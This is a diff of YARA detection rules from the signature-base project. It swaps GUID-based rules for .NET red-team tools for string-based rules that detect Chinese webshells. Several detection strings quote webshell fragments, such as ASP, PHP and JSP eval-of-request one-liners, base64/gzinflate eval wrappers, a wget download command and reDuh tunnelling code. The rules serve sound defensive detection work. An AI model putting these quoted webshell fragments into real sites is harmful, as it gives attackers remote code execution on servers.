-		logic_hash = "cf417eb45867b6fe77cf229688b3c210814a902949840ed946a9d9cff8c8a3d7"
+		hash = "512d0a3e7bb7056338ad0167f485a8a6fa1532a3"
+		logic_hash = "954115da374b6d72c35244673799be6e8bae5288f53509dea04e3ae3c489af12"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "e9e80ac7-4c13-45bd-9bde-ca89aadf1294" ascii wide
-		$typelibguid0up = "E9E80AC7-4C13-45BD-9BDE-CA89AADF1294" ascii wide
+		$s1 = "errorlog(\"FRONTEND: send_command '\".$data.\"' on port \".$port.\" returned \"." ascii
+		$s2 = "$msg = \"newData:\".$socketNumber.\":\".$targetHost.\":\".$targetPort.\":\".$seq" ascii
+		$s3 = "errorlog(\"BACKEND: *** Socket key is \".$sockkey);" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 57KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsniper : FILE
+rule SIGNATURE_BASE_Customize_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "14e6a3b8-5e1f-5dd8-9b51-22522ac317e7"
-		date = "2020-12-29"
-		modified = "2023-04-06"
-		reference = "https://github.com/HunnicCyber/SharpSniper"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4198-L4212"
+		description = "Chinese Hacktool Set - file Customize.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1f7e9063-33d8-5df4-89d5-7d8fc1be61f0"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L208-L222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5c2c67c24a8ad6ecfac03e9f5bad0731883503d974bf7a0ab313e31c30190fb5"
+		hash = "37cd17543e14109d3785093e150652032a85d734"
+		logic_hash = "aa0940a21eea6ba50a93dd36a8f914f636fdba0685048fc67e16dd68c1c2794e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "c8bb840c-04ce-4b60-a734-faf15abf7b18" ascii wide
-		$typelibguid0up = "C8BB840C-04CE-4B60-A734-FAF15ABF7B18" ascii wide
+		$s1 = "while((l=br.readLine())!=null){sb.append(l+\"\\r\\n\");}}" fullword ascii
+		$s2 = "String Z=EC(request.getParameter(Pwd)+\"\",cs);String z1=EC(request.getParameter" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 30KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharphound3 : FILE
+rule SIGNATURE_BASE_Chinachopper_One : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "58001912-88a1-527d-9d3e-d7c376a1fce4"
-		date = "2020-12-29"
-		modified = "2023-04-06"
-		reference = "https://github.com/BloodHoundAD/SharpHound3"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4214-L4228"
+		description = "Chinese Hacktool Set - file one.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "854fb5c9-38c7-5fd2-a473-66ae297070f5"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L224-L237"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0350505aa796cccc56092fb835269c5aad6de0096bbfc5d1608113e11827951a"
+		hash = "6cd28163be831a58223820e7abe43d5eacb14109"
+		logic_hash = "f9a6e4b8556eb3f1e1cbe0bc4eb225b9564ac59aae4a97f184806c6bec95578d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "a517a8de-5834-411d-abda-2d0e1766539c" ascii wide
-		$typelibguid0up = "A517A8DE-5834-411D-ABDA-2D0E1766539C" ascii wide
+		$s0 = "<%eval request(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 50 and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Blocketw : FILE
+rule SIGNATURE_BASE_CN_Tools_Old : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c2b72fef-6549-5b53-8ccf-232e8d152e96"
-		date = "2020-12-29"
-		modified = "2023-04-06"
-		reference = "https://github.com/Soledge/BlockEtw"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4230-L4244"
+		description = "Chinese Hacktool Set - file old.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bfdb84e8-e5a8-53a4-ae71-e0d1b38d38ef"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L239-L255"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4670091775772f66e82dd7c78ac8f307d301ce849424dabcaf495c46cd737d7f"
+		hash = "f8a007758fda8aa1c0af3c43f3d7e3186a9ff307"
+		logic_hash = "3f0ac357e9a9fb4ee937b53145b33ba1041310d979cbc3feb0a4caf026b9b730"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "daedf7b3-8262-4892-adc4-425dd5f85bca" ascii wide
-		$typelibguid0up = "DAEDF7B3-8262-4892-ADC4-425DD5F85BCA" ascii wide
+		$s0 = "$sCmd = \"wget -qc \".escapeshellarg($sURL).\" -O \".$sFile;" fullword ascii
+		$s1 = "$sURL = \"http://\".$sServer.\"/\".$sFile;" fullword ascii
+		$s2 = "chmod(\"/\".substr($sHash, 0, 2), 0777);" fullword ascii
+		$s3 = "$sCmd = \"echo 123> \".$sFileOut;" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 6KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwifigrabber : FILE
+rule SIGNATURE_BASE_Item_301 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1a457672-743c-56f0-a4d7-6c25f9ce2345"
-		date = "2020-12-29"
-		modified = "2023-04-06"
-		reference = "https://github.com/r3nhat/SharpWifiGrabber"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4246-L4260"
+		description = "Chinese Hacktool Set - file item-301.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4ee9a089-313f-53c1-8196-1348d721dbf4"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L257-L273"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1924847602c4075779697f8b74dee48738f2a4e7852b2431c128e677f6c04407"
+		hash = "15636f0e7dc062437608c1f22b1d39fa15ab2136"
+		logic_hash = "623e235ff3eb0922fe8aee732144a15bcc0c580229654ae988353176f488b085"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "c0997698-2b73-4982-b25b-d0578d1323c2" ascii wide
-		$typelibguid0up = "C0997698-2B73-4982-B25B-D0578D1323C2" ascii wide
+		$s1 = "$sURL = \"301:http://\".$sServer.\"/index.asp\";" fullword ascii
+		$s2 = "(gov)\\\\.(cn)$/i\", $aURL[\"host\"])" ascii
+		$s3 = "$aArg = explode(\" \", $sContent, 5);" fullword ascii
+		$s4 = "$sURL = $aArg[0];" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 3KB and 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpmapexec : FILE
+rule SIGNATURE_BASE_CN_Tools_Item : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b4922734-a486-5c4d-9bd7-5146cfecbf01"
-		date = "2020-12-29"
-		modified = "2023-04-06"
-		reference = "https://github.com/cube0x0/SharpMapExec"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4262-L4276"
+		description = "Chinese Hacktool Set - file item.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "954f24c9-d7d5-56d3-86f0-0cf8832640dd"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L275-L291"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "49055d7159cf93e99b8e4ac53c29a66952955fa10457e7beca8e5e0277acec36"
+		hash = "a584db17ad93f88e56fd14090fae388558be08e4"
+		logic_hash = "1e927fd093aa11ad525f3f64d657f314520669b4237eac8f87d0be53cd848044"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "bd5220f7-e1fb-41d2-91ec-e4c50c6e9b9f" ascii wide
-		$typelibguid0up = "BD5220F7-E1FB-41D2-91EC-E4C50C6E9B9F" ascii wide
+		$s1 = "$sURL = \"http://\".$sServer.\"/\".$sWget;" fullword ascii
+		$s2 = "$sURL = \"301:http://\".$sServer.\"/\".$sWget;" fullword ascii
+		$s3 = "$sWget=\"index.asp\";" fullword ascii
+		$s4 = "$aURL += array(\"scheme\" => \"\", \"host\" => \"\", \"path\" => \"\");" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 4KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_K8Fly : FILE
+rule SIGNATURE_BASE_F3_Diy : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3421e6fb-df65-5e2e-ae46-37f9c763c6a1"
-		date = "2020-12-29"
-		modified = "2023-04-06"
-		reference = "https://github.com/zzwlpx/k8fly"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4278-L4292"
+		description = "Chinese Hacktool Set - file diy.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9f36c6dd-89e8-511b-a499-131f1e8a420a"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L293-L307"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "16e9707f017aedf412ec98a466ec945e630ec1e294ee97e52a918d54be93db91"
+		hash = "f39c2f64abe5e86d8d36dbb7b1921c7eab63bec9"
+		logic_hash = "37d6bc61d790ff30c98ded08ff875431fda525cd3ac10b4b1ba3f8f42167ed8c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "13b6c843-f3d4-4585-b4f3-e2672a47931e" ascii wide
-		$typelibguid0up = "13B6C843-F3D4-4585-B4F3-E2672A47931E" ascii wide
+		$s0 = "<%@LANGUAGE=\"VBScript.Encode\" CODEPAGE=\"936\"%>" fullword ascii
+		$s5 = ".black {" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x253c and filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Stealer : FILE
+rule SIGNATURE_BASE_Chinachopper_Temp : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c721a0ac-e898-52aa-9bdf-a19bc0bd783d"
-		date = "2020-12-29"
-		modified = "2023-04-06"
-		reference = "https://github.com/malwares/Stealer"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4294-L4312"
+		description = "Chinese Hacktool Set - file temp.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f163787f-fcc9-568a-a12d-4057cb4f0d29"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L309-L325"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "541836ece736557383d209a424a0fa9fb9df69a669d8f1cf8d1bdb41bd27af57"
+		hash = "b0561ea52331c794977d69704345717b4eb0a2a7"
+		logic_hash = "3669dfa10867970456f6638035a87d448e2b728387fbd07b59ffd981a1ab6200"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "8fcd4931-91a2-4e18-849b-70de34ab75df" ascii wide
-		$typelibguid0up = "8FCD4931-91A2-4E18-849B-70DE34AB75DF" ascii wide
-		$typelibguid1lo = "e48811ca-8af8-4e73-85dd-2045b9cca73a" ascii wide
-		$typelibguid1up = "E48811CA-8AF8-4E73-85DD-2045B9CCA73A" ascii wide
-		$typelibguid2lo = "d3d8a1cc-e123-4905-b3de-374749122fcf" ascii wide
-		$typelibguid2up = "D3D8A1CC-E123-4905-B3DE-374749122FCF" ascii wide
+		$s0 = "o.run \"ff\",Server,Response,Request,Application,Session,Error" fullword ascii
+		$s1 = "Set o = Server.CreateObject(\"ScriptControl\")" fullword ascii
+		$s2 = "o.language = \"vbscript\"" fullword ascii
+		$s3 = "o.addcode(Request(\"SC\"))" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Porttran : FILE
+rule SIGNATURE_BASE_Tools_2015 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "844e58a2-54f5-51e8-8176-6a478a136603"
-		date = "2020-12-29"
-		modified = "2023-04-06"
-		reference = "https://github.com/k8gege/PortTran"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4314-L4330"
+		description = "Chinese Hacktool Set - file 2015.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "eb2826ab-ef8d-5a93-9ede-f5bbd7ab4ff4"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L327-L344"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9dda69710b7ff29e34181d694a4922f0da27e1959dd72031ac630a4851a48c62"
+		hash = "8fc67359567b78cadf5d5c91a623de1c1d2ab689"
+		logic_hash = "2b93ef42c277fd8415cf89bf1bef3e841c56a2b4aa1507d99b84cd8adc9a0644"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "3a074374-77e8-4312-8746-37f3cb00e82c" ascii wide
-		$typelibguid0up = "3A074374-77E8-4312-8746-37F3CB00E82C" ascii wide
-		$typelibguid1lo = "67a73bac-f59d-4227-9220-e20a2ef42782" ascii wide
-		$typelibguid1up = "67A73BAC-F59D-4227-9220-E20A2EF42782" ascii wide
+		$s0 = "Configbis = new BufferedInputStream(httpUrl.getInputStream());" fullword ascii
+		$s4 = "System.out.println(Oute.toString());" fullword ascii
+		$s5 = "String ConfigFile = Outpath + \"/\" + request.getParameter(\"ConFile\");" fullword ascii
+		$s8 = "HttpURLConnection httpUrl = null;" fullword ascii
+		$s19 = "Configbos = new BufferedOutputStream(new FileOutputStream(Outf));;" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 7KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Gray_Keylogger_2 : FILE
+rule SIGNATURE_BASE_Chinachopper_Temp_2 : FILE
 {
 	meta:
-		description = "Detects VB.NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "40ab8103-9151-5a5c-8b70-ab3bfd3896f9"
-		date = "2020-12-30"
-		modified = "2023-04-06"
-		reference = "https://github.com/graysuit/gray-keylogger-2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4333-L4349"
+		description = "Chinese Hacktool Set - file temp.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3952ed2b-fb27-5c45-9cd7-b7a300b37c0e"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L346-L359"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eb7cbfcc7d57298d3ce325596834e94f3594bafb0273e9f81715114b21af6371"
+		hash = "604a4c07161ce1cd54aed5566e5720161b59deee"
+		logic_hash = "1b6d840797afcdbf7c72836557dbd486780c760471e79133810346c301cca80b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "e94ca3ff-c0e5-4d1a-ad5e-f6ebbe365067" ascii wide
-		$typelibguid0up = "E94CA3FF-C0E5-4D1A-AD5E-F6EBBE365067" ascii wide
-		$typelibguid1lo = "1ed07564-b411-4626-88e5-e1cd8ecd860a" ascii wide
-		$typelibguid1up = "1ED07564-B411-4626-88E5-E1CD8ECD860A" ascii wide
+		$s0 = "@eval($_POST[strtoupper(md5(gmdate(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 150 and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_Miner : FILE
+rule SIGNATURE_BASE_Templatr : FILE
 {
 	meta:
-		description = "Detects VB.NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d0631817-10a2-55bf-a41d-226fa0dcb9f9"
-		date = "2020-12-30"
-		modified = "2023-04-06"
-		reference = "https://github.com/NYAN-x-CAT/Lime-Miner"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4351-L4365"
+		description = "Chinese Hacktool Set - file templatr.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b361a49d-1e05-5597-bf8b-735e04397ffa"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L361-L374"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "57d75144415518c24e2a24fa933e9e205513e16c2ec062b2a3c715a0fa6415db"
+		hash = "759df470103d36a12c7d8cf4883b0c58fe98156b"
+		logic_hash = "80d207ee47c0c602ddd281e0e187b83cdb4f1385f4b46ad2a4f5630b8f9e96a1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "13958fb9-dfc1-4e2c-8a8d-a5e68abdbc66" ascii wide
-		$typelibguid0up = "13958FB9-DFC1-4E2C-8A8D-A5E68ABDBC66" ascii wide
+		$s0 = "eval(gzinflate(base64_decode('" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 70KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Blacknet : FILE
+rule SIGNATURE_BASE_Reduhservers_Reduh_3 : FILE
 {
 	meta:
-		description = "Detects VB.NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9fbb3c11-7b11-5910-9c8b-247aeefbaa87"
-		date = "2020-12-30"
-		modified = "2023-04-06"
-		reference = "https://github.com/BlackHacker511/BlackNET"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4367-L4387"
+		description = "Chinese Hacktool Set - file reDuh.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "69f5fd6b-a9b3-500b-8723-d1c82494903d"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L376-L392"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a64b8d7d73292675e86ff73a0548582af36a6ed3c37fec52a3d2e012c49b9aa8"
+		hash = "0744f64c24bf4c0bef54651f7c88a63e452b3b2d"
+		logic_hash = "5a3bc023e0e8a5ccc8ee8e1b5e7ee0fca64e3f92b72d0aad15b25c82a23da487"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "c2b90883-abee-4cfa-af66-dfd93ec617a5" ascii wide
-		$typelibguid0up = "C2B90883-ABEE-4CFA-AF66-DFD93EC617A5" ascii wide
-		$typelibguid1lo = "8bb6f5b4-e7c7-4554-afd1-48f368774837" ascii wide
-		$typelibguid1up = "8BB6F5B4-E7C7-4554-AFD1-48F368774837" ascii wide
-		$typelibguid2lo = "983ae28c-91c3-4072-8cdf-698b2ff7a967" ascii wide
-		$typelibguid2up = "983AE28C-91C3-4072-8CDF-698B2FF7A967" ascii wide
-		$typelibguid3lo = "9ac18cdc-3711-4719-9cfb-5b5f2d51fd5a" ascii wide
-		$typelibguid3up = "9AC18CDC-3711-4719-9CFB-5B5F2D51FD5A" ascii wide
+		$s1 = "Response.Write(\"[Error]Unable to connect to reDuh.jsp main process on port \" +" ascii
+		$s2 = "host = System.Net.Dns.Resolve(\"127.0.0.1\");" fullword ascii
+		$s3 = "rw.WriteLine(\"[newData]\" + targetHost + \":\" + targetPort + \":\" + socketNum" ascii
+		$s4 = "Response.Write(\"Error: Bad port or host or socketnumber for creating new socket" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 40KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Plasmarat : FILE
+rule SIGNATURE_BASE_Chinachopper_Temp_3 : FILE
 {
 	meta:
-		description = "Detects VB.NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "13362cba-f9b2-50c8-95cc-504e585bdd42"
-		date = "2020-12-30"
-		modified = "2023-04-06"
-		reference = "https://github.com/mwsrc/PlasmaRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4389-L4405"
+		description = "Chinese Hacktool Set - file temp.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "573e7da6-f58f-5814-b3e8-a0db3ecfe558"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L394-L408"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4474f0c9d76a6ec1dd754b0b9ba0bcedce3f82148ecddcdcc4d040220c407788"
+		hash = "c5ecb8bc1d7f0e716b06107b5bd275008acaf7b7"
+		logic_hash = "6a0d7817607362f325957e30cace24d32635b7e0411e161588ee573118f91b6a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "b8a2147c-074c-46e1-bb99-c8431a6546ce" ascii wide
-		$typelibguid0up = "B8A2147C-074C-46E1-BB99-C8431A6546CE" ascii wide
-		$typelibguid1lo = "0fcfde33-213f-4fb6-ac15-efb20393d4f3" ascii wide
-		$typelibguid1up = "0FCFDE33-213F-4FB6-AC15-EFB20393D4F3" ascii wide
+		$s0 = "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"" ascii
+		$s1 = "\"],\"unsafe\");%>" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x253c and filesize < 150 and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_RAT : FILE
+rule SIGNATURE_BASE_Shell_Asp : FILE
 {
 	meta:
-		description = "Detects VB.NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "31a0e9ca-9da1-557a-bcc5-1351fa90a0e1"
-		date = "2020-12-30"
-		modified = "2023-04-06"
-		reference = "https://github.com/NYAN-x-CAT/Lime-RAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4407-L4461"
+		description = "Chinese Hacktool Set Webshells - file Asp.html"
+		author = "Florian Roth (Nextron Systems)"
+		id = "52089205-8f36-5a0b-a1ae-67c91a253ad2"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L410-L425"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dfe208c2962c03c14ff21f5936f476ee75ebd5f1464d26e5da0e66d6e995716d"
+		hash = "5e0bc914ac287aa1418f6554ddbe0ce25f2b5f20"
+		logic_hash = "47c5c242713446471d5da4d9245b99561c26ad7fa016059076a6f0acab542c3c"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "e58ac447-ab07-402a-9c96-95e284a76a8d" ascii wide
-		$typelibguid0up = "E58AC447-AB07-402A-9C96-95E284A76A8D" ascii wide
-		$typelibguid1lo = "8fb35dab-73cd-4163-8868-c4dbcbdf0c17" ascii wide
